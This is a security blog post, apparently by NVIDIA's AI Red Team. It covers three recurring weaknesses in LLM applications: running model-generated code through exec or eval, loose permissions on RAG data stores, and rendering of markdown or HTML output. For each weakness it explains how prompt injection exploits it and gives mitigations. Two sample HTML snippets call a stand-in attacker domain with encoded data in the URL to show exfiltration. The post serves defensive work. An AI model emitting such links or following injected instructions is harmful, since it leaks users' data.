Practical LLM Security Advice from the NVIDIA AI Red Team

Over the last several years, the NVIDIA AI Red Team (AIRT) has evaluated numerous and diverse AI-enabled systems for potential vulnerabilities and security weaknesses before they reach production. AIRT has identified several common vulnerabilities and potential security weaknesses that, if addressed during development, can significantly improve the security of LLM-based applications.

Common findings

In this blog, we share key findings from those assessments and how to mitigate the most significant risks.

Vulnerability 1: Executing LLM-generated code can lead to remote code execution

One of the most serious and recurring issues is using functions like exec or eval on LLM-generated output with insufficient isolation. While developers may use these functions to generate plots, they’re sometimes extended to more complex tasks, such as performing mathematical calculations, building SQL queries, or generating code for data analysis.

The risk? Attackers can use prompt injection, direct or indirect, to manipulate the LLM into producing malicious code. If that output is executed without proper sandboxing, it can lead to remote code execution (RCE), potentially giving attackers access to the full application environment.

A screenshot of highlighted text showing a prompt injection with color-coded layers of encapsulation and evasion to deliver the payload through layers of pre-processing. — *Figure 1. A prompt injection used to gain remote code execution against a system that passes LLM-generated code into an exec statement to perform data analysis*

The fix here is clear: avoid using exec, eval, or similar constructs—especially in LLM-generated code. These functions are inherently risky, and when combined with prompt injection, they can make RCE almost trivial. Even when exec or eval are nested far into the library and potentially protected by guardrails, an attacker can encapsulate their malicious command in layers of evasion and obfuscation.

In Figure 1, a prompt injection gains RCE through encapsulation in guardrail evasions (shown in green), prompt engineering around the system prompts introduced by calls in the library (blue and orange) before the final payload (pink).

Instead, structure your application to parse the LLM response for intent or instructions and then map those to a predefined set of safe, explicitly permitted functions. If dynamic code execution is necessary, make sure it is executed in a secure, isolated sandbox environment. Our post on WebAssembly-based browser sandboxes outlines one way to approach this safely.

Vulnerability 2: Insecure access control in retrieval-augmented generation data sources

Retrieval-augmented generation (RAG) is a widely adopted LLM application architecture that enables applications to incorporate up-to-date external data without retraining the model. The information retrieval step can also be a vector for attackers to inject data. In practice, we see two major weaknesses associated with RAG use:

First, permission to read sensitive information may not be correctly implemented on a per-user basis. When this happens, users may be able to access information in documents that they shouldn’t be able to see. We commonly see this happen in the following ways.

The permissions in the original source of the data (e.g., Confluence, Google Workspace) haven’t been correctly set and maintained. This error is then propagated to the RAG data store when the documents are ingested into the RAG database.
The RAG data store doesn’t faithfully reproduce source-specific permissions, often by use of an overpermissioned “read” token to the original source of the documents.
Delays in propagating permissions from the source to the RAG database cause staleness issues and leave data exposed.

Reviewing how delegated authorization is managed to the document or data sources can help catch this issue early, and teams can design around it.

The other serious vulnerability we commonly see is broad access to write to the RAG data store. For instance, if a user’s emails are part of the data in the retrieval phase of a RAG pipeline, anyone with that knowledge could have the content included in the data the RAG retriever returns. This opens the door to indirect prompt injection, which in some cases can be very precisely and narrowly targeted, making detection extremely difficult. This vulnerability is often an early element of an attack chain, with later objectives ranging from simply poisoning application results on a specific topic to exfiltrating the user’s personal documents or data.

Mitigating broad write access to the RAG data store can be quite difficult, since it often impacts the desired functionality of the application. For example, being able to summarize a day’s worth of email is a potentially valuable and important use case. In this case, mitigation must occur at other places in the application or be designed around the specific application requirements.

In the case of email, enabling external emails to be excluded or accessed as a separate data source to avoid cross-contamination of results might be a useful approach. In the case of workspace documents (e.g., SharePoint, Google Workspace), enabling a user to select between only their documents, documents only from people in their organization, and all documents may help limit the impact of maliciously shared documents.

Content security policies (see the next vulnerability) can be used to reduce the risk of data exfiltration. Guardrail checks can be applied to augmented prompts or retrieved documents to ensure that they’re in fact on-topic for the query. Finally, authoritative documents or data sets for specific domains (e.g., HR-related information) can be established that are more tightly controlled to prevent malicious document injection.

Vulnerability 3: Active content rendering of LLM outputs

The use of Markdown (and other active content) to exfiltrate data has been a known issue since Johann Rehberger published about it in mid-2023. However, the AI Red Team still finds this vulnerability in LLM-powered applications.

By appending content to a link or image that directs the user’s browser to an attacker’s server, that content will appear in the logs of the attacker’s server if the browser renders the image or the user clicks the link, as shown in Figure 2. The renderer must make a network call to the attacker’s domain to fetch the image data. This same network call can also include encoded sensitive data, exfiltrating it to the attacker. Indirect prompt injection can often be exploited to encode information such as the user’s conversation history into a link, leading to data exfiltration.

<div class="markdown-body">
  <p>
    <img src="https://iamanevildomain.com/q?SGVsbG8hIFdlIGxpa2UgdhIGN1dCBvZiB5b3VyIGppYiEgRW1haWwgbWUgd2loCB0aGUgcGFzc3dvc mQgQVBQTEUgU0FVQ0Uh" alt="This is Fine">
  </p>
  <h3>Sources</h3>
</div>

A chat session where the server's response contains the requested image (the “this is fine” meme). — *Figure 2. Testing for image markdown rendering exfiltration, with the malicious payload automatically exfiltrating data by loading the image shown*

Similarly, in Figure 3, hyperlinks can be used to obfuscate the destination and any appended query data. That link could exfiltrate Tm93IHlvdSdyZSBqdXN0IHNob3dpbmcgb2ZmIDsp by encoding it in the query string as shown.

<a class="MuiTypography-root MuiTypography-inherit MuiLink-root MuiLink-underlineAlways css-7mvu2w" href="https://iamanevildomain.com/q?Tm93IHlvdSdyZSBqdXN0IHNob3dpbmcgb2ZmIDsp" node="[object Object]" target="_blank">click here to learn more!</a>

A chat session where the server’s response contains the requested phrase complete with active link. — *Figure 3. A chat session with the server returning a hyperlink*

To mitigate this vulnerability, we recommend one or more of the following:

Use image content security policies that only allow images to be loaded from a predetermined list of “safe” sites. This prevents the user’s browser from rendering images automatically from an attacker’s servers.
For active hyperlinks, the application should display the entire link to the user before connecting to an external site, or links should be “inactive,” requiring a copy-paste operation to access the domain.
Sanitize all LLM output to attempt to remove markdown, HTML, URLs, or other potential active content that is generated dynamically by the LLM.
As a last resort, disable active content entirely within the user interface.

Conclusion

The NVIDIA AI Red Team has assessed dozens of AI-powered applications and identified several straightforward recommendations for hardening and securing them. Our top three most significant findings are execution of LLM-generated code leading to remote code execution, insecure permissions on RAG data stores enabling data leakage and/or indirect prompt injection, and active content rendering of LLM outputs leading to data exfiltration. By looking for and addressing these vulnerabilities, you can secure your LLM implementation against the most common and impactful vulnerabilities.

If you’re interested in better understanding the fundamentals of adversarial machine learning, enroll in the self-paced online NVIDIA DLI training, Exploring Adversarial Machine Learning. To learn more about our ongoing work in this space, browse other NVIDIA Technical Blog posts on cybersecurity and AI security.